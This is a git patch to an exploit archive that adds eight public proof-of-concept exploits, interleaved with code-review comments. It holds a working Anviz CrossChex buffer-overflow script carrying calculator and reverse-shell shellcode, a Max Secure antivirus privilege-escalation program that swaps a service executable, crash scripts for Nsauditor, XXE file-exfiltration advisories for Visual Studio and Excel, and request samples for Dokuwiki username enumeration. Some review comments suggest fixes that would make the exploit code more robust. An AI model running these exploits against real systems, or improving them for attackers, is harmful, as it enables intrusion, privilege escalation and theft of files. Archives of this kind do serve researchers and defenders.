From 0f56f2f38c39ffd3ea85b2f59092ecf08a0fd097 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 3 Dec 2019 05:01:42 +0000
Subject: [PATCH] DB: 2019-12-03

8 changes to exploits/shellcodes

Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
Visual Studio 2008 - XML External Entity Injection
Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
Anviz CrossChex 4.3.12 - Local Buffer Overflow
Microsoft Excel 2016 1901 - XML External Entity Injection
SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
Dokuwiki 2018-04-22b - Username Enumeration
---
exploits/php/webapps/47730.txt | 123 ++++++++++++++++++++++++++++
exploits/php/webapps/47731.txt | 37 +++++++++
exploits/windows/dos/47728.py | 35 ++++++++
exploits/windows/dos/47732.py | 37 +++++++++
exploits/windows/local/47733.txt | 133 +++++++++++++++++++++++++++++++
exploits/windows/local/47734.py | 125 +++++++++++++++++++++++++++++
exploits/xml/local/47729.txt | 113 ++++++++++++++++++++++++++
exploits/xml/local/47735.txt | 107 +++++++++++++++++++++++++
files_exploits.csv | 8 ++
9 files changed, 718 insertions(+)
create mode 100644 exploits/php/webapps/47730.txt
create mode 100644 exploits/php/webapps/47731.txt
create mode 100755 exploits/windows/dos/47728.py
create mode 100755 exploits/windows/dos/47732.py
create mode 100644 exploits/windows/local/47733.txt
create mode 100755 exploits/windows/local/47734.py
create mode 100644 exploits/xml/local/47729.txt
create mode 100644 exploits/xml/local/47735.txt

diff --git a/exploits/php/webapps/47730.txt b/exploits/php/webapps/47730.txt
new file mode 100644
index 000000000..bcd16c8d8
--- /dev/null
+++ b/exploits/php/webapps/47730.txt
@@ -0,0 +1,123 @@ +# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery +# Discovery by: LiquidWorm +# Date: 2019-12-02 +# Vendor Homepage: http://www.gavazzi-automation.com +# Tested Version: 6.5.33.17072501 +# CVE: N/A +# Advisory ID: ZSL-2019-5543 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php + +Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities + + +Vendor: Carlo Gavazzi Automation S.p.A +Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu +Affected version: Web-app: 6.5.33.17072501 + Web-app: 6.5.32.17062101 + Web-app: 6.2.3.16102701 + Web-app: 5.5.3.160421101 + Web-app: 5.3.3.15120101 + Release: 1.0.5.1 + Release: 1.0.5.0 + Release: 1.0.3.5 + Release: 1.0.3.2 + +Summary: Carlo Gavazzi is an international company that develops, manufactures +and sells electrical automation components. Our products are used in industrial +automation and real estate automation. Smart-house is based on a system that we +have developed and produced since 1986, mainly for industrial-related installations. +Our system is present in more than 150,000 installations. For a few years now, we +have focused our development on smart electrical installations for home and property +automation. Smart-house is currently installed in both villas and commercial properties. + +Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application +allows users to perform certain actions via HTTP requests without performing any validity +checks to verify the requests. This can be exploited to perform certain actions with +administrative privileges if a logged-in user visits a malicious web site. Input passed +to several GET/POST parameters is not properly sanitised before being returned to the user. +This can be exploited to execute arbitrary HTML and script code in a user's browser session +in context of an affected site. 
+ +Tested on: Apache + PHP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5543 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php + + +01.11.2019 + +-- + + +Reflected XSS (GET): +-------------------- + +1. http://192.168.0.24/app/index.php?error=Waddup"> (pre-auth) +2. http://192.168.0.24/app/messagepage.php?msg= (pre-auth) +3. http://192.168.0.24/app/detaf.php?p=0&l=50">&f=5658 (post-auth) +4. http://192.168.0.24/app/detaf.php?p=0">&l=50&f=5658 (post-auth) +5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction">&grpl=1 (post-auth) + + +CSRF set temperature: +--------------------- + + + +
+ + + + + + + +
+ + + + +Stored XSS (POST): +------------------ + + + +
+ + + + + + + + + + + +
+ + + + +Reflected XSS (POST): +--------------------- + + + +
+ + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/47731.txt b/exploits/php/webapps/47731.txt new file mode 100644 index 000000000..e78a79dc7 --- /dev/null +++ b/exploits/php/webapps/47731.txt @@ -0,0 +1,37 @@ +# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration +# Date: 2019-12-01 +# Exploit Author: Talha ŞEN +# Vendor Homepage: https://www.dokuwiki.org/dokuwiki +# Software Link: https://download.dokuwiki.org/ +# Version: 2018-04-22b "Greebo" +# Tested on: +# Alpine Linux 3.5 (docker image) +# PHP 5.6.30 +# Apache/2.4.25 (Unix) +# CVE : + +# At login page there is a "set new password" page as below: +# Forgotten your password? Get a new one: Set new password +# At this page there is username enumeration vulnerability. +# Testing for non-valid user: + +POST /doku.php?id=start&do=resendpwd HTTP/1.1 + +sectok=&do=resendpwd&save=1&login=sss + +# Response for non-valid user(sss): + +
Sorry, we can't find this user in our database.
+ +======================================================================== + +# Testing for valid user: + +POST /doku.php?id=start&do=resendpwd HTTP/1.1 + +sectok=&do=resendpwd&save=1&login=admin + +# Response for valid user (admin): + +
There was an unexpected problem communicating with SMTP: Could not open SMTP Port.
+
Looks like there was an error on sending the password mail. Please contact the admin!
\ No newline at end of file
diff --git a/exploits/windows/dos/47728.py b/exploits/windows/dos/47728.py
new file mode 100755
index 000000000..0f3f7639e
--- /dev/null
+++ b/exploits/windows/dos/47728.py
@@ -0,0 +1,35 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
+# software significantly reduces the total cost of network management in enterprise environments by enabling
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+# PoC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 1000
+try:
+ f=open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/47732.py b/exploits/windows/dos/47732.py
new file mode 100755
index 000000000..2c52b2d2e
--- /dev/null
+++ b/exploits/windows/dos/47732.py
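Review bot: The `#!/usr/bin/env python` line sits well below the comment header, so the shebang is inert and the 100755 mode on this file buys nothing: a shebang is only honoured on the very first line, and exploits/windows/dos/47732.py has the same layout. The bare `except:` discards the reason `dos.txt` could not be written; `except IOError as e:` with `e` in the message would make the failure diagnosable, and the `open`/`close` pair would be safer as `with open("dos.txt", "w") as f:`. The numbered steps in the PoC comment run 1, 3, 2, 6, 5 and should be renumbered in the order they are listed.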
@@ -0,0 +1,37 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+# Email : blackwolf@post.com
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks
+# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise
+# network for all potential methods that a hacker might use to attack it and create a report of potential
+# problems that were found , Nsauditor network auditing software significantly reduces the total cost of
+# network management in enterprise environments by enabling IT personnel and systems administrators gather
+# a wide range of information from all the computers in the network without installing server-side applications
+# on these computers and create a report of potential problems that were found.
+
+# POC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1000
+try:
+ f=open("dos.txt","w")
+ print "[+] Creating %s bytes DOS payload.." %len(buffer)
+ f.write(buffer)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/47733.txt b/exploits/windows/local/47733.txt
new file mode 100644
index 000000000..2c4ac32b5
--- /dev/null
+++ b/exploits/windows/local/47733.txt
@@ -0,0 +1,133 @@ +# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions +# Discovery by: hyp3rlinx +# Date: 2019-12-02 +# Vendor Homepage: www.maxpcsecure.com +# Tested Version: 19.0.4.020 +# CVE: N/A + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.maxpcsecure.com + + +[Affected Product Code Base] +Max Secure Anti Virus Plus - 19.0.4.020 + +File hash: ab1dda23ad3955eb18fdb75f3cbc308a +msplusx64.exe + + +[Vulnerability Type] +Insecure Permissions + + +[CVE Reference] +N/A + + +[Security Issue] +Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory. +Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation. + +C:\Program Files\Max Secure Anti Virus Plus>cacls * | more +C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F + BUILTIN\Users:(ID)F + NT AUTHORITY\SYSTEM:(ID)F + BUILTIN\Administrators:(ID)F + + +[Affected Component] +Permissions on installation directory + + +[Exploit/POC] +#include +#include +#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe" +#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe" +#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp" + +/* Max Secure Anti Virus Plus PoC By hyp3rlinx */ + +BOOL PWNED=FALSE; + +BOOL FileExists(LPCTSTR szPath){ + DWORD dwAttrib = GetFileAttributes(szPath); + return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY)); +} + +void main(void){ + + if(!FileExists(DISABLED_TARGET)){ + CopyFile(TARGET, TMP, FALSE); + Sleep(1000); + CopyFile(TMP, DISABLED_TARGET, FALSE); + printf("[+] Max Secure Anti Virus Plus EoP PoC\n"); + Sleep(1000); + printf("[+] Disabled MaxSDUI.exe ...\n"); + 
Sleep(300); + }else{ + PWNED=TRUE; + } + + if(!PWNED){ + char fname[MAX_PATH]; + char newLoc[]=TARGET; + DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH); + if (size){ + printf("[+] Copying exploit to vuln dir...\n"); + Sleep(1000); + CopyFile(fname, TARGET, FALSE); + printf("[+] Replaced legit Max Secure EXE...\n"); + Sleep(2000); + printf("[+] Done!\n"); + MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk"); + Sleep(1000); + exit(0); + } + }else{ + if(FileExists(TMP)){ + remove(TMP); + } + printf("[+] Max Secure Anti Virus Plus PWNED!!!\n"); + printf("[+] hyp3rlinx\n"); + system("pause"); + } +} + + +[POC Video URL] +https://www.youtube.com/watch?v=DXSV5geXkTw + + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: November 19, 2019 +Vendor: "received a reply they will fix soon" +Status request: November 24, 2019 +No replies other than automated response. +November 29, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/47734.py b/exploits/windows/local/47734.py new file mode 100755 index 000000000..c29323419 --- /dev/null +++ b/exploits/windows/local/47734.py 
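Review bot: The PoC's `void main(void)` is not a standard C entry-point signature, and one branch leaves through `exit(0)` while the other falls off the end; `int main(void)` returning an int on both paths is the portable form. The return values of `CopyFile` and `MoveFile` are never checked, so every `printf` status line is printed even when the underlying call failed, and `char newLoc[]=TARGET;` is assigned but never used. The `#include` targets are not visible in this rendering, so I cannot confirm the headers cover the Win32 calls used.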
@@ -0,0 +1,125 @@ +# Exploit Title: Anviz CrossChex 4.3.12 - Local Buffer Overflow +# Date: 2019-11-30 +# Exploit Author: Luis Catarino & Pedro Rodrigues +# Vendor Homepage: https://www.anviz.com/ +# Software Link: https://www.anviz.com/download.html +# Version: Crosschex Standard x86 <= V4.3.12 +# Tested on: 4.3.8.0, 4.3.12 +# CVE : N/A +# More info: https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html + +import socket +import time +import sys +import binascii + +# Scapy for the broadcast packet with custom sport +from scapy.all import Raw,IP,Dot1Q,UDP,Ether +import scapy.all + +# shellcode working calc.exe +calculator_payload = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" +calculator_payload += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" +calculator_payload += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" +calculator_payload += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" +calculator_payload += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" +calculator_payload += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" +calculator_payload += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" +calculator_payload += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" +calculator_payload += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" +calculator_payload += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" +calculator_payload += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x6a\x01\x8d\x85\xb2\x00" +calculator_payload += b"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5" +calculator_payload += b"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a" +calculator_payload += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" +calculator_payload += b"\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" + +# shellcode windows x86 reverse_shell +shell_payload_1 = b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" +shell_payload_1 += b"\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" 
+shell_payload_1 += b"\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" +shell_payload_1 += b"\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" +shell_payload_1 += b"\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" +shell_payload_1 += b"\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" +shell_payload_1 += b"\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" +shell_payload_1 += b"\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" +shell_payload_1 += b"\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" +shell_payload_1 += b"\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" +shell_payload_1 += b"\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" +shell_payload_1 += b"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" +shell_payload_1 += b"\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +shell_payload_1 += b"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +shell_payload_1 += b"\xdf\xe0\xff\xd5\x97\x6a\x05\x68" + +# shellcode windows x86 reverse_shell (part_2) +shell_payload_2 = b"\x68\x02\x00\x01\xbd\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5" +shell_payload_2 += b"\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec" +shell_payload_2 += b"\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89" +shell_payload_2 += b"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66" +shell_payload_2 += b"\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" +shell_payload_2 += b"\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68" +shell_payload_2 += b"\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30" +shell_payload_2 += b"\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68" +shell_payload_2 += b"\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0" +shell_payload_2 += b"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5" + +def ipToShellcode(ip): + a = ip.split('.') + b = hex(int(a[0])) + hex(int(a[1])) + hex(int(a[2])) + hex(int(a[3])) + b = b.replace("0x","") + return binascii.unhexlify(b) + +# sport has to be 5060 +def 
sendFuzzingUDPBroadcast(ip="255.255.255.255", sport=5050, dport=5060): + request = b"A"*77 # Original payload substitute + request += b"B"*184 + request += b"\x07\x18\x42\x00" # EIP - 00421807 crosscheck_standard.exe + request += b"A"*4 + # 269 bytes + + if len(sys.argv) > 2: + request = request + shell_payload_1 + ipToShellcode(sys.argv[2]) + shell_payload_2 + else: + request = request + calculator_payload + + scapy.all.sendp( Ether(src='00:00:00:00:00:00', dst="ff:ff:ff:ff:ff:ff")/IP(src=ip,dst='255.255.255.255')/UDP(sport=sport,dport=dport)/Raw(load=request), iface=sys.argv[1] ) + +def setFuzzUDPServer(ip='', port=5050, timeout=150): + try : + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + except: + print('[!] Failed to create server socket') + + try: + s.bind(('', port)) + except: + print('[*] Server socket bind failed') + sys.exit() + + print('[*] Waiting for crosschex') + s.settimeout(timeout) + timeout = time.time() + timeout + responses = [] + + while True: + if time.time() > timeout: + break + try: + response = s.recvfrom(1024) + print(response) + responses.append(response) + sendFuzzingUDPBroadcast(ip=ip) + response = s.recvfrom(1024) + except socket.timeout: + print("[!] Error with UDP server") + + s.close() + return responses + +nargs = len(sys.argv) + +if nargs < 2: + print("[*] Usage: python3 %s []\n\tif you don't pass the ip of the LHOST it will drop a calculator, if you set the ip it will send a reverse shell to port 445") + sys.exit(0) + +setFuzzUDPServer() \ No newline at end of file diff --git a/exploits/xml/local/47729.txt b/exploits/xml/local/47729.txt new file mode 100644 index 000000000..3b18accf6 --- /dev/null +++ b/exploits/xml/local/47729.txt 
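Review bot: In `setFuzzUDPServer` a failed `socket.socket()` is only printed and execution continues, so the following `s.bind(('', port))` raises `NameError` on the unbound `s` instead of the intended diagnostic; the first handler should exit like the second, e.g. `except socket.error:` followed by `print('[!] Failed to create server socket')` and `sys.exit()`, and both bare `except:` clauses should name `socket.error`. The usage string in the `nargs < 2` branch contains a `%s` that is never formatted, so it is printed literally; presumably `% sys.argv[0]` was intended. Inside the receive loop the second `s.recvfrom(1024)` result is assigned to `response` but never used, which looks like it was meant to drain the reply; a comment saying so, or dropping the assignment, would make the intent clear.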
@@ -0,0 +1,113 @@ +# Exploit Title: Visual Studio 2008 - XML External Entity Injection +# Discovery by: hyp3rlinx +# Date: 2019-12-02 +# Vendor Homepage: www.microsoft.com +# Software Link: Visual Studio 2008 Express IDE +# Tested Version: 2008 +# CVE: N/A + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-VISUAL-STUDIO-EXPRESS-2008-IDE-XML-EXTERNAL-ENTITY-0Day.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Visual Studio 2008 Express IDE +vcsetup.exe +File hash: 62f764849e8fcdf8bfbc342685641304 +Download: http://go.microsoft.com/?linkid=7729279 + + +[Vulnerability Type] +XML External Entity Injection 0Day + + +[CVE Reference] +N/A + + +[Security Issue] +Visual Studio 2008 IDE suffers from XML External Entity injection. Attackers can leverage many file types, some being MASM related files like .asm or .lst. +By opening any one of the following file types listed below, it can allow remote attackers to steal files from the victims computer, sending them to the +remote attackers server. + +Double click any of the following extensions and it will trigger the XXE vulnerability. Note, upon installation of the IDE the following file types get +associated with Visual Studio 2008 and are ALL vulnerable and will trigger the XXE exploit. + +[Vuln XXE file types] +.snippet +.i +.s +.asm +.disco +.lst +.inc +.srf +.wsdl +.rgs +.xml + +This IDE is pretty old, I know, but its still available for download as of this writing, therefore I release the advisory. + + +[References] +https://devblogs.microsoft.com/visualstudio/end-of-support-for-visual-studio-2008-in-one-year/ + + +[Exploit/POC] +"Evil.snippet" or any of the extensions mentioned above. 
+ + + + +%dtd;]> +&send; + + +"payload.dtd" + + +"> +%all; + + +python -m SimpleHTTPServer +python -m http.server (Python3) + + +[POC Video URL] +https://www.youtube.com/watch?v=QOZlwzsbPrk + + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: 3/24/2017 +MSRC sent me link to "Definition of a Security Vulnerability" +Also Product is also not supported anymore. +December 1, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/exploits/xml/local/47735.txt b/exploits/xml/local/47735.txt new file mode 100644 index 000000000..422886185 --- /dev/null +++ b/exploits/xml/local/47735.txt 
@@ -0,0 +1,107 @@ +# Exploit Title: Microsoft Excel 2016 1901 - XML External Entity Injection +# Discovery by: hyp3rlinx +# Date: 2019-12-02 +# Vendor Homepage: www.microsoft.com +# Tested Version: 2016 v1901 +# CVE: N/A + +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-EXCEL-2016-v1901-IMPORT-ERROR-EXTERNAL-ENTITY-INJECTION.txt +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Excel 2016 v1901 + +Microsoft Excel is a spreadsheet developed by Microsoft for Windows, macOS, Android and iOS. +It features calculation, graphing tools, pivot tables, and a macro programming language called Visual Basic for Applications. + + +[CVE] +N/A + + +[Vulnerability Type] +Error Import Based XML External Entity Injection + + +[Security Issue] +Excel query from file feature is vulnerable to "Error" based XML External Entity attacks, if the user chooses the "Import as +Html page" functionality upon receiving errors importing a specially crafted XML file. + +This can result in potential remote data exfiltration, user interaction is required to exploit this vulnerability. + +Tested successfuly Windows 10 .NET framework version v4.0.30319. + +C:\>dir /b %windir%\Microsoft.NET\Framework\v* +v4.0.30319 + + +[Exploit/POC] +Create a new ".xlsx" file then, go to Data tab and choose 'New Query/From File/From XML' + +1) You will get error like: + +"Error: + +Unable to connect + +We encountered an error while trying to connect. + +The user will then get an option to 'Edit' where they can import the file as an HTML file + +Result Local data can be exfiltrated to remote server" + +2) Excel will then give you option to 'Edit' and import as 'Html Page' from the drop down menu in Excel + +User has choose to import as HTML then XXE attack will succeed: + +e.g. 
+ +127.0.0.1 - - [05/Mar/2019 15:31:16] "GET /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FO +/1.1" 200 - + + +Malicious XML file to load as New Data Query + +"test.xml" + + + + +%dtd;]> +&send; + + + +[Network Access] +Local + + +[Severity] +Medium + + +[Disclosure Timeline] +Vendor Notification: May 10, 2019 +MSRC: May 17, 2019 "case did not meet the bar for servicing as a Security Release. +Engineering Team may or may not fix in a future version of the release." +November 30, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index abb7ab111..f0d1b99a4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6614,6 +6614,8 @@ id,file,description,date,author,type,platform,port
 47721,exploits/ios/dos/47721.py,"GHIA CamIP 1.2 for iOS - 'Password' Denial of Service (PoC)",2019-11-28,"Ivan Marmolejo",dos,ios,
 47723,exploits/windows/dos/47723.py,"SpotAuditor 5.3.2 - 'Key' Denial of Service",2019-11-29,ZwX,dos,windows,
 47727,exploits/windows/dos/47727.py,"SpotAuditor 5.3.2 - 'Name' Denial of Service",2019-11-29,ZwX,dos,windows,
+47728,exploits/windows/dos/47728.py,"Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
+47732,exploits/windows/dos/47732.py,"Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)",2019-12-02,SajjadBnd,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
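Review bot: The `date` column of the new rows is 2019-12-02 for all eight entries, but the file headers in this commit give 2019-11-30 for 47728, 47732 and 47734 and 2019-12-01 for 47731; if the column records the publication date rather than the author's date that is fine, but the convention is not stated anywhere in the diff. In the second hunk the `47734` row credits `"Luis Catarino"` alone while the header of exploits/windows/local/47734.py names `Luis Catarino & Pedro Rodrigues`; if the column allows it, `"Luis Catarino & Pedro Rodrigues"` would match the file. The same date point applies to the rows added in the second and third hunks of this file.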
@@ -10817,6 +10819,10 @@ id,file,description,date,author,type,platform,port
 47715,exploits/windows/local/47715.md,"VMware WorkStation 12.5.3 - Virtual Machine Escape",2019-06-06,unamer,local,windows,
 47724,exploits/windows/local/47724.txt,"TexasSoft CyberPlanet 6.4.131 - 'CCSrvProxy' Unquoted Service Path",2019-11-29,"Cristian Ayala G",local,windows,
 47726,exploits/linux/local/47726.sh,"Bash 5.0 Patch 11 - SUID Priv Drop Exploit",2019-11-29,"Mohin Paramasivam",local,linux,
+47729,exploits/xml/local/47729.txt,"Visual Studio 2008 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
+47733,exploits/windows/local/47733.txt,"Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions",2019-12-02,hyp3rlinx,local,windows,
+47734,exploits/windows/local/47734.py,"Anviz CrossChex 4.3.12 - Local Buffer Overflow",2019-12-02,"Luis Catarino",local,windows,
+47735,exploits/xml/local/47735.txt,"Microsoft Excel 2016 1901 - XML External Entity Injection",2019-12-02,hyp3rlinx,local,xml,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42039,3 +42045,5 @@ id,file,description,date,author,type,platform,port
 47720,exploits/php/webapps/47720.txt,"Wordpress 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,
